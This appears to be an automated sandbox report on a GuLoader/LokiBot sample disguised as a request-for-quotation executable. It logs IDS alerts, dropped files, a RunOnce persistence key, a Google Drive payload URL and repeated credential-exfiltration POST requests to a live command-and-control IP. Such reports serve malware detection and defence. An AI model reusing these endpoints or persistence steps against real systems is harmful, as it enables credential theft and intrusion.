Analysis Report RFQ#5647201929.exe

Overview

General Information

Joe Sandbox Version: 28.0.0 Lapis Lazuli
Analysis ID: 218796
Start date: 30.03.2020
Start time: 05:53:54
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 5m 42s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: RFQ#5647201929.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit (version 1803) with Office 2016, Adobe Reader DC 19, Chrome 70, Firefox 63, Java 8.171, Flash 30.0.0.113
Number of new started processes analysed: 8
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis stop reason: Timeout
Detection: MAL
Classification: mal99.rans.troj.spyw.evad.winEXE@9/4@1/2
EGA Information:
  • Successful, ratio: 100%
HDC Information:
  • Successful, ratio: 25.3% (good quality ratio 10.3%)
  • Quality average: 26.4%
  • Quality standard deviation: 35.7%
HCA Information:
  • Successful, ratio: 90%
  • Number of executed functions: 105
  • Number of non-executed functions: 28
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
  • Found application associated with file extension: .exe
Warnings:
  • Excluded processes from analysis (whitelisted): dllhost.exe, WMIADAP.exe
  • Excluded IPs from analysis (whitelisted): 172.217.18.174, 2.18.68.82, 205.185.216.10, 205.185.216.42, 93.184.221.240, 2.20.143.23, 2.20.143.16
  • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, fs.microsoft.com, wu.ec.azureedge.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, cds.d2s7q6s2.hwcdn.net, a767.dscg3.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, wu.azureedge.net, audownload.windowsupdate.nsatc.net, au.download.windowsupdate.com.hwcdn.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, drive.google.com, prod.fs.microsoft.com.akadns.net, wu.wpc.apr-52dd2.edgecastdns.net
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtProtectVirtualMemory calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.

Detection

Strategy: Threshold
Score: 99
Range: 0 - 100
Whitelisted: false
Threat: GuLoader Lokibot
Detection: malicious

Confidence

Strategy: Threshold
Score: 5
Range: 0 - 5
Further Analysis Required?: false


Classification Spiderchart (chart image)

Analysis Advice

Uses HTTPS for network communication; use the 'Proxy HTTPS (port 443) to read its encrypted data' cookbook for further analysis.



MITRE ATT&CK Matrix

Techniques are listed per tactic column; the digits following a technique name are the report's signature-count badges as extracted.

Initial Access: Valid Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Spearphishing Link
Execution: Scripting 11; Graphical User Interface 2; Windows Management Instrumentation; Scheduled Task; Command-Line Interface; Graphical User Interface
Persistence: Registry Run Keys / Startup Folder 11; Port Monitors; Accessibility Features; System Firmware; Shortcut Modification; Modify Existing Service
Privilege Escalation: Process Injection 11; Accessibility Features; Path Interception; DLL Search Order Hijacking; File System Permissions Weakness; New Service
Defense Evasion: Masquerading 1; Software Packing 1; Virtualization/Sandbox Evasion 12; Process Injection 11; Scripting 11; Obfuscated Files or Information 1
Credential Access: Credential Dumping 2; Credentials in Registry 1; Input Capture; Credentials in Files; Account Manipulation; Brute Force
Discovery: Virtualization/Sandbox Evasion 12; Security Software Discovery 311; Remote System Discovery 1; File and Directory Discovery 1; System Information Discovery 13; System Owner/User Discovery
Lateral Movement: Application Deployment Software; Remote Services; Windows Remote Management; Logon Scripts; Shared Webroot; Third-party Software
Collection: Email Collection 1; Data from Local System 2; Data from Network Shared Drive; Input Capture; Data Staged; Screen Capture
Exfiltration: Data Compressed; Exfiltration Over Other Network Medium; Automated Exfiltration; Data Encrypted; Scheduled Transfer; Data Transfer Size Limits
Command and Control: Standard Cryptographic Protocol 2; Standard Non-Application Layer Protocol 2; Standard Application Layer Protocol 13; Multiband Communication; Standard Cryptographic Protocol; Commonly Used Port
Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service
Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
Impact: Modify System Partition; Device Lockout; Delete Device Data; Premium SMS Toll Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features

Signature Overview



AV Detection:

Antivirus detection for dropped file
  Source: C:\Users\user\Trkvogn\TELETE.exe | Avira: detection malicious, Label: HEUR/AGEN.1046816
Antivirus detection for sample
  Source: RFQ#5647201929.exe | Avira: detection malicious, Label: HEUR/AGEN.1046816
Multi AV Scanner detection for dropped file
  Source: C:\Users\user\Trkvogn\TELETE.exe | Virustotal: Detection: 11%
Multi AV Scanner detection for submitted file
  Source: RFQ#5647201929.exe | Virustotal: Detection: 11%
Antivirus or Machine Learning detection for unpacked file
  Source: 2.2.RFQ#5647201929.exe.2350000.0.unpack | Avira: Label: TR/Dropper.Gen

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
  Source: Traffic | Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.5:49748 -> 94.176.239.112:80
  Source: Traffic | Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49748 -> 94.176.239.112:80
  Source: Traffic | Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49748 -> 94.176.239.112:80
  Source: Traffic | Snort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.5:49748 -> 94.176.239.112:80
  Source: Traffic | Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.5:49749 -> 94.176.239.112:80
  Source: Traffic | Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49749 -> 94.176.239.112:80
  Source: Traffic | Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49749 -> 94.176.239.112:80
  Source: Traffic | Snort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.5:49749 -> 94.176.239.112:80
  Source: Traffic | Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49750 -> 94.176.239.112:80
  Source: Traffic | Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49750 -> 94.176.239.112:80
  Source: Traffic | Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49750 -> 94.176.239.112:80
  Source: Traffic | Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49750 -> 94.176.239.112:80
  Source: Traffic | Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49751 -> 94.176.239.112:80
  Source: Traffic | Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49751 -> 94.176.239.112:80
  Source: Traffic | Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49751 -> 94.176.239.112:80
  Source: Traffic | Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49751 -> 94.176.239.112:80
  Source: Traffic | Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49752 -> 94.176.239.112:80
  Source: Traffic | Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49752 -> 94.176.239.112:80
  Source: Traffic | Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49752 -> 94.176.239.112:80
  Source: Traffic | Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49752 -> 94.176.239.112:80
Internet Provider seen in connection with other malware
  Source: Joe Sandbox View | ASN Name: unknown unknown
JA3 SSL client fingerprint seen in connection with other malware
  Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Uses a known web browser user agent for HTTP communication
  Source: global traffic | HTTP traffic detected (2 identical entries):
    POST /panel02/fre.php HTTP/1.0
    User-Agent: Mozilla/4.08 (Charon; Inferno)
    Host: 94.176.239.112
    Accept: */*
    Content-Type: application/octet-stream
    Content-Encoding: binary
    Content-Key: E6DA1EF2
    Content-Length: 176
    Connection: close
  Source: global traffic | HTTP traffic detected (3 identical entries):
    POST /panel02/fre.php HTTP/1.0
    User-Agent: Mozilla/4.08 (Charon; Inferno)
    Host: 94.176.239.112
    Accept: */*
    Content-Type: application/octet-stream
    Content-Encoding: binary
    Content-Key: E6DA1EF2
    Content-Length: 149
    Connection: close
Connects to IPs without corresponding DNS lookups
  Source: unknown | TCP traffic detected without corresponding DNS query: 94.176.239.112 (32 identical entries)
Performs DNS lookups
  Source: unknown | DNS traffic detected: queries for: doc-0k-6o-docs.googleusercontent.com
Posts data to webserver
  Source: unknown | HTTP traffic detected:
    POST /panel02/fre.php HTTP/1.0
    User-Agent: Mozilla/4.08 (Charon; Inferno)
    Host: 94.176.239.112
    Accept: */*
    Content-Type: application/octet-stream
    Content-Encoding: binary
    Content-Key: E6DA1EF2
    Content-Length: 176
    Connection: close
Urls found in memory or binary data
  Source: TELETE.exe, 00000004.00000002.802899350.000000001F605000.00000004.00000001.sdmp | String found in binary or memory: http://crl.pki.goog/GTS1O1.crl0
  Source: TELETE.exe, 00000004.00000002.802899350.000000001F605000.00000004.00000001.sdmp | String found in binary or memory: http://crl.pki.goog/gsr2/gsr2.crl0?
  Source: RFQ#5647201929.exe, 00000000.00000002.752595454.00000000021D0000.00000040.00000001.sdmp, RFQ#5647201929.exe, 00000002.00000002.756617158.00000000004F0000.00000040.00000001.sdmp, TELETE.exe, 00000003.00000002.773378940.00000000021C0000.00000040.00000001.sdmp, TELETE.exe, 00000004.00000002.794302606.00000000004F0000.00000040.00000001.sdmp | String found in binary or memory: http://myurl/myfile.bin
  Source: TELETE.exe, 00000004.00000002.802899350.000000001F605000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.pki.goog/gsr202
  Source: TELETE.exe, 00000004.00000002.802899350.000000001F605000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.pki.goog/gts1o10
  Source: TELETE.exe, 00000004.00000002.802899350.000000001F605000.00000004.00000001.sdmp | String found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt0
  Source: RFQ#5647201929.exe, 00000000.00000002.752595454.00000000021D0000.00000040.00000001.sdmp, RFQ#5647201929.exe, 00000002.00000002.756617158.00000000004F0000.00000040.00000001.sdmp, TELETE.exe, 00000003.00000002.773378940.00000000021C0000.00000040.00000001.sdmp, TELETE.exe, 00000004.00000002.794302606.00000000004F0000.00000040.00000001.sdmp | String found in binary or memory: https://drive.google.com/uc?export=download&id=1uqQyxL22Ae7En-Yd5pp5Uc9nOK8n0zcP
  Source: TELETE.exe, 00000004.00000002.802899350.000000001F605000.00000004.00000001.sdmp | String found in binary or memory: https://pki.goog/repository/0
Uses HTTPS
  Source: unknown | Network traffic detected: HTTP traffic on port 49747 -> 443
  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49747

System Summary:

Potential malicious icon found
  Source: initial sample | Icon embedded in PE file: bad icon match: 20047c7c70f0e004
Contains functionality to call native functions
  Source: C:\Users\user\Desktop\RFQ#5647201929.exe | Code function: 0_2_021D2009 NtWriteVirtualMemory
  Source: C:\Users\user\Desktop\RFQ#5647201929.exe | Code function: 0_2_021D022B EnumWindows, NtSetInformationThread, TerminateProcess
  Source: C:\Users\user\Desktop\RFQ#5647201929.exe | Code function: 0_2_021D5D03 NtResumeThread
  Source: C:\Users\user\Desktop\RFQ#5647201929.exe | Code function: 0_2_021D592C NtProtectVirtualMemory
  Source: C:\Users\user\Desktop\RFQ#5647201929.exe | Code function: 0_2_021D2466 NtWriteVirtualMemory
  Source: C:\Users\user\Desktop\RFQ#5647201929.exe | Code function: 0_2_021D02A6 NtSetInformationThread, TerminateProcess
  Source: C:\Users\user\Desktop\RFQ#5647201929.exe | Code function: 0_2_021D62C7 NtResumeThread
  Source: C:\Users\user\Desktop\RFQ#5647201929.exe | Code function: 0_2_021D60C2 NtResumeThread
  Source: C:\Users\user\Desktop\RFQ#5647201929.exe | Code function: 0_2_021D5EEE NtResumeThread
  Source: C:\Users\user\Desktop\RFQ#5647201929.exe | Code function: 0_2_021D211C NtWriteVirtualMemory
  Source: C:\Users\user\Desktop\RFQ#5647201929.exe | Code function: 0_2_021D5D0C NtResumeThread
  Source: C:\Users\user\Desktop\RFQ#5647201929.exe | Code function: 0_2_021D2303 NtWriteVirtualMemory
  Source: C:\Users\user\Desktop\RFQ#5647201929.exe | Code function: 0_2_021D5F9A NtResumeThread
  Source: C:\Users\user\Desktop\RFQ#5647201929.exe | Code function: 0_2_021D6194 NtResumeThread
  Source: C:\Users\user\Desktop\RFQ#5647201929.exe | Code function: 0_2_021D21B6 NtWriteVirtualMemory
  Source: C:\Users\user\Desktop\RFQ#5647201929.exe | Code function: 0_2_021D5DAC NtResumeThread
  Source: C:\Users\user\Desktop\RFQ#5647201929.exe | Code function: 2_2_004F022B EnumWindows, NtSetInformationThread, TerminateProcess
  Source: C:\Users\user\Desktop\RFQ#5647201929.exe | Code function: 2_2_004F592C NtProtectVirtualMemory
  Source: C:\Users\user\Desktop\RFQ#5647201929.exe | Code function: 2_2_004F02A6 NtSetInformationThread, TerminateProcess
  Source: C:\Users\user\Trkvogn\TELETE.exe | Code function: 3_2_021C2009 NtWriteVirtualMemory
  Source: C:\Users\user\Trkvogn\TELETE.exe | Code function: 3_2_021C022B EnumWindows, NtSetInformationThread, TerminateProcess
  Source: C:\Users\user\Trkvogn\TELETE.exe | Code function: 3_2_021C5D03 NtResumeThread
  Source: C:\Users\user\Trkvogn\TELETE.exe | Code function: 3_2_021C592C NtProtectVirtualMemory
  Source: C:\Users\user\Trkvogn\TELETE.exe | Code function: 3_2_021C2466 NtWriteVirtualMemory
  Source: C:\Users\user\Trkvogn\TELETE.exe | Code function: 3_2_021C02A6 NtSetInformationThread, TerminateProcess
  Source: C:\Users\user\Trkvogn\TELETE.exe | Code function: 3_2_021C62C7 NtResumeThread
  Source: C:\Users\user\Trkvogn\TELETE.exe | Code function: 3_2_021C60C2 NtResumeThread
  Source: C:\Users\user\Trkvogn\TELETE.exe | Code function: 3_2_021C5EEE NtResumeThread
  Source: C:\Users\user\Trkvogn\TELETE.exe | Code function: 3_2_021C211C NtWriteVirtualMemory
  Source: C:\Users\user\Trkvogn\TELETE.exe | Code function: 3_2_021C5D0C NtResumeThread
  Source: C:\Users\user\Trkvogn\TELETE.exe | Code function: 3_2_021C2303 NtWriteVirtualMemory
  Source: C:\Users\user\Trkvogn\TELETE.exe | Code function: 3_2_021C5F9A NtResumeThread
  Source: C:\Users\user\Trkvogn\TELETE.exe | Code function: 3_2_021C6194 NtResumeThread
  Source: C:\Users\user\Trkvogn\TELETE.exe | Code function: 3_2_021C21B6 NtWriteVirtualMemory
  Source: C:\Users\user\Trkvogn\TELETE.exe | Code function: 3_2_021C5DAC NtResumeThread
  Source: C:\Users\user\Trkvogn\TELETE.exe | Code function: 4_2_004F022B EnumWindows, NtSetInformationThread
  Source: C:\Users\user\Trkvogn\TELETE.exe | Code function: 4_2_004F5D03 NtSetInformationThread
  Source: C:\Users\user\Trkvogn\TELETE.exe | Code function: 4_2_004F592C NtProtectVirtualMemory
  Source: C:\Users\user\Trkvogn\TELETE.exe | Code function: 4_2_004F62C7 NtSetInformationThread
  Source: C:\Users\user\Trkvogn\TELETE.exe | Code function: 4_2_004F60C2 NtSetInformationThread
  Source: C:\Users\user\Trkvogn\TELETE.exe | Code function: 4_2_004F5EEE NtSetInformationThread
  Source: C:\Users\user\Trkvogn\TELETE.exe | Code function: 4_2_004F02A6 NtSetInformationThread
  Source: C:\Users\user\Trkvogn\TELETE.exe | Code function: 4_2_004F5D0C NtSetInformationThread
  Source: C:\Users\user\Trkvogn\TELETE.exe | Code function: 4_2_004F5F9A NtSetInformationThread
  Source: C:\Users\user\Trkvogn\TELETE.exe | Code function: 4_2_004F6194 NtSetInformationThread
  Source: C:\Users\user\Trkvogn\TELETE.exe | Code function: 4_2_004F5DAC NtSetInformationThread
PE file contains strange resources
  Source: RFQ#5647201929.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
  Source: TELETE.exe.2.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Sample file is different than original file name gathered from version info
  Source: RFQ#5647201929.exe, 00000000.00000000.740957273.0000000000418000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameCream.exe vs RFQ#5647201929.exe
  Source: RFQ#5647201929.exe, 00000000.00000002.752546203.00000000021A0000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenameuser32j% vs RFQ#5647201929.exe
  Source: RFQ#5647201929.exe, 00000002.00000002.769160984.000000001E900000.00000002.00000001.sdmp | Binary or memory string: originalfilename vs RFQ#5647201929.exe
  Source: RFQ#5647201929.exe, 00000002.00000002.769160984.000000001E900000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs RFQ#5647201929.exe
  Source: RFQ#5647201929.exe, 00000002.00000002.768673642.000000001E8A0000.00000002.00000001.sdmp | Binary or memory string: System.OriginalFileName vs RFQ#5647201929.exe
  Source: RFQ#5647201929.exe, 00000002.00000000.751272611.0000000000418000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameCream.exe vs RFQ#5647201929.exe
  Source: RFQ#5647201929.exe | Binary or memory string: OriginalFilenameCream.exe vs RFQ#5647201929.exe
Classification label
  Source: classification engine | Classification label: mal99.rans.troj.spyw.evad.winEXE@9/4@1/2
Creates files inside the user directory
  Source: C:\Users\user\Desktop\RFQ#5647201929.exe | File created: C:\Users\user\Trkvogn
Creates mutexes
  Source: C:\Users\user\Trkvogn\TELETE.exe | Mutant created: \Sessions\1\BaseNamedObjects\F7EE0CF1CF93AA2F06F12A09
Executes visual basic scripts
  Source: unknown | Process created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\Trkvogn\TELETE.vbs'
PE file has an executable .text section and no other executable section
  Source: RFQ#5647201929.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Parts of this application are using VB runtime library 6.0 (probably coded in Visual Basic)
  Source: C:\Users\user\Desktop\RFQ#5647201929.exe | Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
  Source: C:\Users\user\Trkvogn\TELETE.exe | Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
Reads ini files
  Source: C:\Users\user\Desktop\RFQ#5647201929.exe | File read: C:\Users\user\Desktop\desktop.ini
Reads software policies
  Source: C:\Users\user\Desktop\RFQ#5647201929.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Reads the hosts file
  Source: C:\Users\user\Trkvogn\TELETE.exe | File read: C:\Windows\System32\drivers\etc\hosts (4 identical entries)
Sample is known by Antivirus
  Source: RFQ#5647201929.exe | Virustotal: Detection: 11%
Sample reads its own file content
  Source: C:\Users\user\Desktop\RFQ#5647201929.exe | File read: C:\Users\user\Desktop\RFQ#5647201929.exe
Spawns processes
  Source: unknown | Process created: C:\Users\user\Desktop\RFQ#5647201929.exe 'C:\Users\user\Desktop\RFQ#5647201929.exe' (2 identical entries)
  Source: unknown | Process created: C:\Users\user\Trkvogn\TELETE.exe 'C:\Users\user\Trkvogn\TELETE.exe' (2 identical entries)
  Source: unknown | Process created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\Trkvogn\TELETE.vbs' (2 identical entries)
  Source: C:\Users\user\Desktop\RFQ#5647201929.exe | Process created: C:\Users\user\Desktop\RFQ#5647201929.exe 'C:\Users\user\Desktop\RFQ#5647201929.exe'
  Source: C:\Users\user\Desktop\RFQ#5647201929.exe | Process created: C:\Users\user\Trkvogn\TELETE.exe 'C:\Users\user\Trkvogn\TELETE.exe'
  Source: C:\Users\user\Trkvogn\TELETE.exe | Process created: C:\Users\user\Trkvogn\TELETE.exe 'C:\Users\user\Trkvogn\TELETE.exe'
Uses an in-process (OLE) Automation server
  Source: C:\Users\user\Desktop\RFQ#5647201929.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
Found GUI installer (many successful clicks)
  Source: C:\Windows\System32\wscript.exe | Automated click: OK (2 identical entries)
Found graphical window changes (likely an installer)
  Source: Window Recorder | Window detected: More than 3 window changes detected
Checks if Microsoft Office is installed
  Source: C:\Users\user\Trkvogn\TELETE.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook

Data Obfuscation:

Yara detected GuLoader
  Source: Yara match | File source: Process Memory Space: TELETE.exe PID: 932, type: MEMORY
  Source: Yara match | File source: Process Memory Space: RFQ#5647201929.exe PID: 4916, type: MEMORY
  Source: Yara match | File source: Process Memory Space: TELETE.exe PID: 4944, type: MEMORY
  Source: Yara match | File source: Process Memory Space: RFQ#5647201929.exe PID: 4712, type: MEMORY
Uses code obfuscation techniques (call, push, ret)
  Source: C:\Users\user\Desktop\RFQ#5647201929.exe | Code function: 0_2_0040AE72 push ebp; retf 0_2_0040AE73
  Source: C:\Users\user\Desktop\RFQ#5647201929.exe | Code function: 0_2_0040D2F7 push ecx; iretd 0_2_0040D2F8
  Source: C:\Users\user\Desktop\RFQ#5647201929.exe | Code function: 0_2_004068AD push 00000003h; ret 0_2_004068B0
  Source: C:\Users\user\Desktop\RFQ#5647201929.exe | Code function: 0_2_00406BE2 push ebx; ret 0_2_00406CFA

Persistence and Installation Behavior:

Drops PE files
  Source: C:\Users\user\Desktop\RFQ#5647201929.exe | File created: C:\Users\user\Trkvogn\TELETE.exe

Boot Survival:

Creates autostart registry keys with suspicious values (likely registry only malware)
  Source: C:\Users\user\Desktop\RFQ#5647201929.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce ORDREMO C:\Users\user\Trkvogn\TELETE.vbs (2 identical entries)
Creates an autostart registry key
  Source: C:\Users\user\Desktop\RFQ#5647201929.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce ORDREMO (4 identical entries)

Hooking and other Techniques for Hiding and Protection:

Disables application error messages (SetErrorMode)
  Source: C:\Users\user\Desktop\RFQ#5647201929.exe | Process information set: NOOPENFILEERRORBOX (12 identical entries)
  Source: C:\Users\user\Trkvogn\TELETE.exe | Process information set: NOOPENFILEERRORBOX (7 identical entries)
  Source: C:\Users\user\Trkvogn\TELETE.exe | Process information set: NOGPFAULTERRORBOX (38 identical entries)
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
